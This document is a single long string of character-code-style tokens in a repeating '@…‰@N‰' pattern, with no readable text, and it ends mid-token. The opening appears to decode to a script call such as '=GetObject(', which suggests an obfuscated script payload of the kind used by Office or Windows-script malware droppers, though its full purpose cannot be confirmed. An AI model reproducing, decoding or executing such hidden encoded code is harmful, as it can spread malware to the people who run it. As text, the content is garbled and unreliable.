@C‰@>‰@N‰@D‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@>‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@D‰@@‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@D‰@F‰@N‰@>‰@=‰@?‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@?‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@F‰@D‰@N‰@A‰@C‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@D‰@E‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@C‰@C‰@N‰@C‰@>‰@N‰@D‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@>‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@B‰@=‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@D‰@@‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@D‰@F‰@N‰@>‰@=‰@?‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@B‰@?‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@F‰@D‰@N‰@A‰@C‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@E‰@N‰@F‰@D‰@N‰@>‰@?‰@>‰@N‰@D‰@E‰@N‰@F‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@D‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@C‰@N‰@A‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@C‰@C‰@N‰@C‰@>‰@N‰@D‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@A‰@E‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@A‰@C‰@N‰@D‰@@‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@F‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@D‰@F‰@N‰@>‰@=‰@?‰@N‰@A‰@=‰@N‰@>‰@?‰@>‰@N‰@A‰@=‰@N‰@>‰@=‰@F‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@F‰@D‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@F‰@E‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@F‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@A‰@F‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@F‰@D‰@N‰@A‰@C‰@N‰@>‰@>‰@E‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@@‰@?‰@N‰@>‰@=‰@F‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@B‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@C‰@>‰@N‰@F‰@D‰@N‰@A‰@C‰@N‰@F‰@F‰@N‰@F‰@D‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@E‰@D‰@N‰@E‰@@‰@N‰@F‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@A‰@N‰@A‰@=‰@N‰@A‰@E‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@A‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@=‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@A‰@N‰@A‰@=‰@N‰@D‰@E‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@D‰@F‰@N‰@F‰@E‰@N‰@>‰@=‰@C‰@N‰@>‰@=‰@>‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@>‰@=‰@C‰@N‰@A‰@=‰@N‰@D‰@E‰@N‰@A‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@C‰@F‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@D‰@=‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@C‰@F‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@>‰@>‰@B‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@C‰@F‰@N‰@>‰@?‰@=‰@N‰@@‰@?‰@N‰@C‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@C‰@F‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@?‰@N‰@F‰@D‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@C‰@F‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@E‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@E‰@@‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@B‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@@‰@A‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@@‰@E‰@N‰@@‰@A‰@N‰@@‰@D‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@E‰@=‰@N‰@>‰@>‰@C‰@N‰@A‰@=‰@N‰@C‰@D‰@N‰@A‰@A‰@N‰@C‰@B‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@=‰@N‰@>‰@>‰@C‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@@‰@?‰@N‰@E‰@E‰@N‰@C‰@>‰@N‰@C‰@D‰@N‰@>‰@>‰@A‰@N‰@A‰@=‰@N‰@B‰@>‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@E‰@N‰@A‰@C‰@N‰@D‰@F‰@N‰@>‰@>‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@=‰@N‰@D‰@F‰@N‰@E‰@@‰@N‰@E‰@A‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@@‰@A‰@N‰@>‰@=‰@A‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@?‰@N‰@B‰@E‰@N‰@A‰@D‰@N‰@A‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@A‰@C‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@D‰@N‰@F‰@F‰@N‰@>‰@=‰@D‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@@‰@N‰@B‰@E‰@N‰@A‰@F‰@N‰@A‰@F‰@N‰@B‰@A‰@N‰@B‰@A‰@N‰@A‰@D‰@N‰@@‰@A‰@N‰@@‰@E‰@N‰@C‰@D‰@N‰@A‰@A‰@N‰@>‰@=‰@?‰@N‰@F‰@D‰@N‰@>‰@=‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@E‰@N‰@A‰@C‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@@‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@A‰@N‰@>‰@=‰@>‰@N‰@F‰@D‰@N‰@>‰@=‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@A‰@B‰@N‰@C‰@B‰@N‰@>‰@=‰@@‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@B‰@E‰@N‰@@‰@A‰@N‰@A‰@A‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@E‰@N‰@A‰@C‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@C‰@B‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@=‰@N‰@>‰@>‰@C‰@N‰@C‰@>‰@N‰@E‰@E‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@?‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@D‰@=‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@C‰@>‰@N‰@@‰@A‰@N‰@@‰@A‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@B‰@N‰@C‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@A‰@=‰@N‰@A‰@F‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@C‰@>‰@N‰@E‰@C‰@N‰@D‰@E‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@F‰@B‰@N‰@@‰@A‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@C‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@C‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@C‰@D‰@N‰@D‰@F‰@N‰@D‰@D‰@N‰@E‰@=‰@N‰@E‰@B‰@N‰@E‰@A‰@N‰@C‰@F‰@N‰@E‰@?‰@N‰@D‰@E‰@N‰@C‰@B‰@N‰@D‰@D‰@N‰@C‰@F‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@C‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@C‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@E‰@@‰@N‰@C‰@F‰@N‰@E‰@?‰@N‰@D‰@E‰@N‰@C‰@B‰@N‰@D‰@D‰@N‰@C‰@F‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@C‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@C‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@A‰@=‰@N‰@B‰@=‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@C‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@C‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@>‰@N‰@A‰@=‰@N‰@B‰@?‰@N‰@A‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@C‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@@‰@E‰@N‰@>‰@>‰@B‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@@‰@E‰@N‰@>‰@>‰@=‰@N‰@>‰@>‰@C‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@@‰@E‰@N‰@>‰@>‰@D‰@N‰@@‰@E‰@N‰@F‰@F‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@C‰@F‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@@‰@?‰@N‰@D‰@=‰@N‰@>‰@>‰@D‰@N‰@>‰@>‰@=‰@N‰@F‰@F‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@E‰@@‰@N‰@>‰@>‰@D‰@N‰@F‰@E‰@N‰@@‰@?‰@N‰@D‰@E‰@N‰@>‰@>‰@B‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@=‰@N‰@@‰@?‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@A‰@N‰@@‰@?‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@B‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@F‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@>‰@=‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@>‰@>‰@C‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@C‰@>‰@N‰@>‰@=‰@>‰@N‰@>‰@?‰@=‰@N‰@A‰@=‰@N‰@@‰@A‰@N‰@E‰@B‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@>‰@N‰@>‰@>‰@A‰@N‰@E‰@=‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@>‰@N‰@>‰@=‰@?‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@@‰@A‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@C‰@D‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@B‰@N‰@A‰@C‰@N‰@C‰@D‰@N‰@>‰@>‰@>‰@N‰@>‰@>‰@?‰@N‰@>‰@?‰@>‰@N‰@D‰@=‰@N‰@>‰@=‰@B‰@N‰@>‰@=‰@E‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@?‰@N‰@>‰@>‰@D‰@N‰@A‰@A‰@N‰@>‰@=‰@=‰@N‰@>‰@>‰@A‰@N‰@A‰@A‰@N‰@>‰@>‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@>‰@D‰@N‰@>‰@=‰@>‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@@‰@N‰@>‰@=‰@N‰@>‰@>‰@B‰@N‰@>‰@=‰@A‰@N‰@A‰@C‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@>‰@N‰@>‰@=‰@@‰@N‰@>‰@>‰@F‰@N‰@>‰@>‰@A‰@N‰@>‰@=‰@B‰@N‰@>‰@>‰@C‰@N‰@>‰@=‰@>‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@A‰@E‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@>‰@=‰@@‰@N‰@A‰@=‰@N‰@B‰@>‰@N‰@A‰@>‰@N‰@@‰@?‰@N‰@@‰@E‰@N‰@@‰@?‰@N‰@@‰@A‰@N‰@E‰@E‰@N‰@E‰@@‰@N‰@B‰@B‰@N‰@D‰